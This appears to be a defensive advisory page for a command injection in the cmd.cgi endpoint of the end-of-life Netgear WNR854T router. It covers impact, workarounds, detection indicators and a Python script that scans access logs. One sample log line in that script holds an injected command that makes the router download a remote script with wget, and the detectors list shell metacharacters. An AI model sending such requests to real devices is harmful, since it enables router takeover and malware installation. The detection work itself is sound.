CVE-2024-54806

9.8 CRITICAL

📋 TL;DR

CVE-2024-54806 is a command injection in the cmd.cgi web interface of the Netgear WNR854T router: a remote attacker can execute arbitrary system commands on the device. The affected build is the North American firmware, version 1.5.2. Successful exploitation gives complete control of the router.

💻 Affected Systems

Products:
  • Netgear WNR854T
Versions: 1.5.2 (North America firmware)
Operating Systems: Embedded router firmware
Default Config Vulnerable: ⚠️ Yes
Notes: Only the North American firmware build is confirmed affected. Other regions and older firmware versions are untested and may also be vulnerable.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete compromise of router allowing attackers to intercept all network traffic, install persistent malware, pivot to internal network devices, and use router as botnet node.

🟠

Likely Case

Router takeover leading to DNS hijacking, credential theft from network traffic, and installation of cryptocurrency miners or other malware.

🟢

If Mitigated

Limited impact if the admin interface is unreachable from the WAN and only trusted hosts can reach it on the LAN; a compromised LAN host can still exploit the device.

🌐 Internet-Facing: HIGH - Exploitable remotely without credentials whenever the admin interface is reachable from the WAN. Remote Management is off by default on Netgear consumer routers, so check the setting rather than assuming either way; once enabled (or exposed through a port-forward), exploitation is a single HTTP request.
🏢 Internal Only: HIGH - Even when not internet-facing, any host on the local network (or a LAN browser induced to send the request on an attacker's behalf) can exploit this vulnerability.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation requires web interface access but no authentication. Simple HTTP requests can trigger command execution.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: None available

Restart Required: No

Instructions:

No official patch available. Netgear WNR854T is end-of-life and no longer supported. Consider replacement with supported router.

🔧 Temporary Workarounds

Disable web interface remote access (applies to: all versions)

Prevent external access to the router web interface so cmd.cgi is not reachable from the WAN. Caveat: this closes only the internet-facing path; a host on the LAN, or a LAN browser tricked into sending the request, can still reach the endpoint.

Login to router admin > Advanced > Remote Management > Disable

Change default admin password (applies to: all versions)

Use a strong, unique password for the router admin account. Caveat: the cmd.cgi flaw is exploitable without credentials, so this does not block it; it hardens the device against other unauthorized changes and against persistence through the admin UI after a compromise.

Login to router admin > Advanced > Administration > Set Password

🧯 If You Can't Patch

  • Replace router with supported model
  • Isolate router in separate VLAN with strict firewall rules
  • Restrict the LAN-side admin interface (TCP/80 on the router's LAN address) to a single management host with a firewall rule or ACL, since the flaw needs no credentials

🔍 How to Verify

Check if Vulnerable:

Check router firmware version in admin interface: Advanced > Administration > Router Status > Firmware Version

Check Version:

The admin UI is protected by HTTP basic auth, so a request without credentials gets a 401 and the grep prints nothing; pass the admin login:

curl -s -u admin:PASSWORD http://router-ip/ | grep -i -E 'firmware|version'

Verify Fix Applied:

No fix available to verify. Verify the workarounds directly: from a host outside your network, confirm the router's WAN address does not answer on the admin port (TCP/80, plus any custom Remote Management port you had configured); from inside, confirm the basic-auth login prompt is presented before anything else is served.

📡 Detection & Monitoring

Log Indicators:

  • Any request to cmd.cgi, POST or GET, especially with URL-encoded shell metacharacters (; | & ` $) in the parameters
  • Multiple failed login attempts followed by cmd.cgi access
  • Device-side evidence of unexpected command execution where the firmware logs it (consumer router logging is minimal, so logs from an upstream proxy, IDS or firewall are the more reliable source)

Network Indicators:

  • HTTP requests to router IP with cmd.cgi parameters
  • Outbound connections from router to suspicious IPs
  • DNS queries to malicious domains from router

SIEM Query:

source="router.log" AND (uri="*cmd.cgi*" OR (method="POST" AND uri="/"))

Group the terms explicitly: Splunk evaluates OR before AND, so the ungrouped form would require uri to be "/" and drop the cmd.cgi hits. The wildcard keeps requests with a query string, and source should point at whatever actually records the router's HTTP traffic (proxy, IDS or firewall), since the device itself logs little.
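The log and network indicators above, run as detection logic over sample access-log lines. This is an added example for this page, not vendor code or a detection the advisory ships. The log lines are constructed in Apache combined format, as a proxy or IDS in front of the router might write them; the query parameter "x" is a placeholder because the advisory does not name the injected parameter, and the RFC 1918 ranges stand in for whatever LAN sits behind the router.

```python
"""Flag requests to the WNR854T cmd.cgi endpoint in HTTP access logs.
Added example for this page, not vendor code. SAMPLE_LOG is constructed; the
parameter "x" is a placeholder, the advisory does not name the vector."""
import ipaddress
import re
from urllib.parse import parse_qsl, urlsplit

SAMPLE_LOG = """\
192.168.1.23 - - [10/Dec/2024:14:03:11 +0000] "GET /status.htm HTTP/1.1" 401 0
203.0.113.45 - - [10/Dec/2024:14:05:02 +0000] "POST /cmd.cgi HTTP/1.1" 200 14
203.0.113.45 - - [10/Dec/2024:14:05:03 +0000] "GET /cmd.cgi?x=1%3Bwget%20http%3A%2F%2F203.0.113.9%2Fa.sh HTTP/1.1" 200 0
192.168.1.7 - - [10/Dec/2024:14:06:40 +0000] "POST /cmd.cgi HTTP/1.1" 200 0
192.168.1.7 - - [10/Dec/2024:14:06:41 +0000] "GET /index.htm HTTP/1.1" 200 3120
"""

# Combined-log format: client, identd, user, [timestamp], "METHOD target proto", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# Assumed LAN ranges; adjust to the network actually behind the router.
LAN_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
SHELL_META = (";", "|", "&", "`", "$(")


def is_external(ip):
    """True when the client address is outside the LAN ranges."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in LAN_NETS)


def shell_metachars(query):
    """Shell metacharacters found inside URL-decoded parameter values.
    parse_qsl splits on the literal '&' first, so a separator is never counted."""
    found = []
    for _name, value in parse_qsl(query, keep_blank_values=True):
        for meta in SHELL_META:
            if meta in value and meta not in found:
                found.append(meta)
    return found


def scan(log_text):
    """Return one alert dict per request whose path ends in cmd.cgi."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.endswith("cmd.cgi"):
            continue
        meta = shell_metachars(url.query)
        external = is_external(m["ip"])
        # A POST body is not in an access log, so a bare POST from the LAN can
        # only be rated medium; an external source or visible metacharacters is high.
        severity = "high" if (meta or external) else "medium"
        alerts.append({
            "ts": m["ts"], "ip": m["ip"], "method": m["method"],
            "status": int(m["status"]), "external": external,
            "metachars": meta, "severity": severity,
        })
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

Against the sample, the two requests from 203.0.113.45 are rated high (external source; the second also carries an encoded ";" in the parameter value) and the LAN POST is rated medium, which reflects the blind spot noted in the comment: an access log shows the path, not the POST body, so LAN traffic to cmd.cgi is worth an alert even when nothing suspicious is visible in the URL.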
